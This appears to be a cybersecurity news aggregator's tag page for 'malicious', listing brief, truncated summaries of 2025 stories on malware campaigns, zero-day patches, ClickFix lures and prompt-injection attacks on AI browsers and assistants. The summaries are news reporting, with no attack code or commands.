Tag: malicious
-
Malware Delivery Shifts: Malicious URLs Surpass Attachments as Top Threat Vector
Cyber attackers have changed their tactics. According to a recent ITPro report, malicious URLs are now four times more common than infected email attachments when it comes to delivering malware. This shift has serious implications for defenders, especially as phishing techniques evolve to exploit trust and emerging communication channels. The Rise of Link-Based Attacks In…
-
UNC5518 Group Hacks Legitimate Sites with Fake Captcha to Deliver Malware
The financially motivated threat group UNC5518 has been infiltrating trustworthy websites to install ClickFix lures, which are misleading phony CAPTCHA pages, as part of a complex cyber campaign that has been monitored since June 2024. These malicious pages trick users into executing downloader scripts that initiate infection chains, often leading to malware deployment by affiliated…
-
Apple Confirms Critical 0-Day Under Active Attack Immediate Update Urged
Apple has issued an emergency security update for iOS 18.6.2 and iPadOS 18.6.2 to address a critical zero-day vulnerability that the company confirms is being actively exploited in sophisticated attacks against targeted individuals. The update, released on August 20, 2025, patches a severe flaw in the ImageIO component that could allow attackers to execute malicious…
-
Apple Patches CVE-2025-43300 Zero-Day in iOS, iPadOS, and macOS Exploited in Targeted Attacks
Apple has released security updates to address a security flaw impacting iOS, iPadOS, and macOS that it said has come under active exploitation in the wild.The zero-day out-of-bounds write vulnerability, tracked as CVE-2025-43300, resides in the ImageIO framework that could result in memory corruption when processing a malicious image.”Apple is aware of a report that…
-
PromptFix Exploit Forces AI Browsers to Execute Hidden Malicious Commands
Cybersecurity researchers have uncovered critical vulnerabilities in AI-powered browsers that allow attackers to manipulate artificial intelligence agents into executing malicious commands without user knowledge, introducing what experts are calling a new era of >>Scamlexity
-
Gemini AI Vulnerable to Calendar-Based Hack: What is Google’s Mitigation Approach?
Hidden prompts in Google Calendar events can trick Gemini AI into executing malicious commands via indirect prompt injection. First seen on techrepublic.com Jump to article: www.techrepublic.com/article/news-google-gemini-indirect-prompt-injection-attack/
-
WinRAR Zero-Day Exploited by Russian-Linked Hackers RomCom and Paper Werewolf
Older WinRAR versions let malicious archives override the user-specified path via crafted archives, enabling stealthy system compromise. First seen on techrepublic.com Jump to article: www.techrepublic.com/article/news-winrar-zero-day-hackers-romcom-paper-werewolf/
-
AI website builder Lovable increasingly abused for malicious activity
Cybercriminals are increasingly abusing the AI-powered Lovable website creation and hosting platform to generate phishing pages, malware-dropping portals, and various fraudulent websites. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/ai-website-builder-lovable-increasingly-abused-for-malicious-activity/
-
Cybercriminals Abuse Vibe Coding Service to Create Malicious Sites
Some LLM-created scripts and emails can lower the barrier of entry for low-skill attackers, who can use services like Lovable to create convincing, effective websites in minutes. First seen on darkreading.com Jump to article: www.darkreading.com/cyberattacks-data-breaches/cybercriminals-abuse-vibe-coding-service-malicious-sites
-
Perplexity’s Comet AI browser tricked into buying fake items online
A study looking into agentic AI browsers has found that these emerging tools are vulnerable to both new and old schemes that could make them interact with malicious pages and prompts. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/perplexitys-comet-ai-browser-tricked-into-buying-fake-items-online/
-
QuirkyLoader: A New Malware Loader Spreading Infostealers and Remote Access Trojans (RATs)
IBM X-Force has tracked QuirkyLoader, a sophisticated loader malware deployed by threat actors to distribute prominent families such as Agent Tesla, AsyncRAT, FormBook, MassLogger, Remcos, Rhadamanthys, and Snake Keylogger. This multi-stage threat initiates through spam emails from legitimate providers or self-hosted servers, attaching malicious archives containing a legitimate executable, an encrypted payload masquerading as a…
-
Signed, Sealed, and Delivered: The Case for Authenticating AI Agents
As agentic AI blends into malicious traffic, Authenticating AI Agents with cryptographic signatures is becoming the only scalable way to separate trusted bots from imposters. First seen on securityboulevard.com Jump to article: securityboulevard.com/2025/08/signed-sealed-and-delivered-the-case-for-authenticating-ai-agents/
-
Experts Find AI Browsers Can Be Tricked by PromptFix Exploit to Run Malicious Hidden Prompts
Cybersecurity researchers have demonstrated a new prompt injection technique called PromptFix that tricks a generative artificial intelligence (GenAI) model into carrying out intended actions by embedding the malicious instruction inside a fake CAPTCHA check on a web page.Described by Guardio Labs an “AI-era take on the ClickFix scam,” the attack technique demonstrates how AI-driven browsers,…
-
Hackers Weaponize QR Codes in New ‘Quishing’ Attacks
Researchers discovered two new phishing techniques where attackers split malicious QR codes or embed them into legitimate ones First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/hackers-qr-codes-new-quishing/
-
Lenovo AI Chatbot Flaw Allows Remote Script Execution on Corporate Systems
Cybersecurity researchers have uncovered critical vulnerabilities in Lenovo’s AI-powered customer support chatbot that could allow attackers to execute malicious scripts on corporate systems and steal sensitive session data. The discovery highlights significant security gaps in enterprise AI implementations and raises concerns about the rapid deployment of AI systems without adequate security controls. Cybernews Researchers identified…
-
New GodRAT Malware Uses Screensaver and Program Files to Target Organizations
Threat actors have been deploying a novel Remote Access Trojan (RAT) dubbed GodRAT, derived from the venerable Gh0st RAT codebase, to infiltrate financial institutions, particularly trading and brokerage firms. The malware is distributed via Skype as malicious .scr (screensaver) and .pif (Program Information File) executables masquerading as legitimate financial documents, such as client lists or…
-
New ClickFix Attack Deploys Fake BBC News Page and Fake Cloudflare Verification to Deceive Users
Cybersecurity researchers have uncovered a novel ClickFix attack variant that impersonates trusted BBC news content while leveraging counterfeit Cloudflare Turnstile verification interfaces to coerce users into executing malicious PowerShell commands. This campaign, detailed in recent analyses from sources like Cybersecurity News and ESET, exploits user familiarity with legitimate web security protocols to deliver a range…
-
New GodRAT Trojan Targets Trading Firms Using Steganography and Gh0st RAT Code
Financial institutions like trading and brokerage firms are the target of a new campaign that delivers a previously unreported remote access trojan called GodRAT.The malicious activity involves the “distribution of malicious .SCR (screen saver) files disguised as financial documents via Skype messenger,” Kaspersky researcher Saurabh Sharma said in a technical analysis published today.The First seen…
-
Surge in Scans From Hacked Cisco, Linksys, and Araknis Routers
Cybersecurity researchers have identified a significant increase in malicious scanning activities originating from compromised consumer and enterprise networking equipment, with particular focus on Cisco, Linksys, and Araknis router models. The Shadowserver Foundation, a prominent threat intelligence organization, has reported observing unusual scanning patterns that suggest widespread compromise of these networking devices. Security analysts are tracking…
-
Surge in Scans From Hacked Cisco, Linksys, and Araknis Routers
Cybersecurity researchers have identified a significant increase in malicious scanning activities originating from compromised consumer and enterprise networking equipment, with particular focus on Cisco, Linksys, and Araknis router models. The Shadowserver Foundation, a prominent threat intelligence organization, has reported observing unusual scanning patterns that suggest widespread compromise of these networking devices. Security analysts are tracking…
-
Cooking with Code: A DevOps Kitchen Secured by Thales
Tags: access, ai, api, cctv, cloud, compliance, control, data, encryption, GDPR, identity, infrastructure, injection, least-privilege, malicious, mfa, military, monitoring, PCI, service, software, strategy, tool, waf, zero-day, zero-trustCooking with Code: A DevOps Kitchen Secured by Thales madhav Tue, 08/19/2025 – 05:13 In today’s hyperconnected digital world, deploying applications is a lot like running a high-performance, Michelin-star kitchen. You need the right setup, a disciplined process, and seamless coordination, where every tool, role, and task moves in harmony, executed flawlessly. Speed and precision…
-
Singapore issues critical alert on Dire Wolf ransomware targeting global tech and manufacturing firms
Tags: attack, authentication, backup, business, compliance, control, credentials, cyber, data, defense, email, endpoint, extortion, insurance, intelligence, leak, malicious, mfa, msp, network, phishing, ransom, ransomware, resilience, risk, supply-chain, threat, updateRipple effects on global enterprises: The global business fallout of Dire Wolf ransomware attacks is significant and poses a multi-layered, high-impact threat to global enterprises.”Its attacks directly disrupt operations and supply chains, particularly in manufacturing and tech, leading to production delays, revenue loss, and downstream customer impact,” said Manish Rawat, analyst at TechInsights. “Financial impact…
-
The Hidden Risks of External AI Models and How Businesses can Mitigate Them
As AI adoption accelerates, businesses face hidden risks from third-party models like ChatGPT and Claude, including data leakage and malicious data infiltration. By implementing corporate AI tools and educating employees, companies can harness generative AI’s benefits while safeguarding sensitive data, compliance, and trust. First seen on securityboulevard.com Jump to article: securityboulevard.com/2025/08/the-hidden-risks-of-external-ai-models-and-how-businesses-can-mitigate-them/
-
XenoRAT malware campaign hits multiple embassies in South Korea
A state-sponsored espionage campaign is targeting foreign embassies in South Korea to deploy XenoRAT malware from malicious GitHub repositories. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/xenorat-malware-campaign-hits-multiple-embassies-in-south-korea/
-
Malicious npm Packages Target Crypto Developers to Steal Login Credentials
A sophisticated threat campaign dubbed >>Solana-Scan>cryptohan
-
XenoRAT malware campaign hits multiple embassies in South Korea
A state-sponsored espionage campaign is targeting foreign embassies in South Korea to deploy XenoRAT malware from malicious GitHub repositories. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/xenorat-malware-campaign-hits-multiple-embassies-in-south-korea/
-
New Sni5Gect Attack Targets 5G to Steal Messages and Inject Payloads
Tags: 5G, attack, communications, cyber, cybersecurity, framework, infrastructure, malicious, technology, vulnerabilityCybersecurity researchers at Singapore University of Technology and Design have unveiled a sophisticated new attack framework calledSNI5GECTthat can intercept 5G communications and inject malicious payloads without requiring a rogue base station. The research demonstrates significant vulnerabilities in the current 5G infrastructure that could allow attackers to crash devices, downgrade connections, and steal user identities from…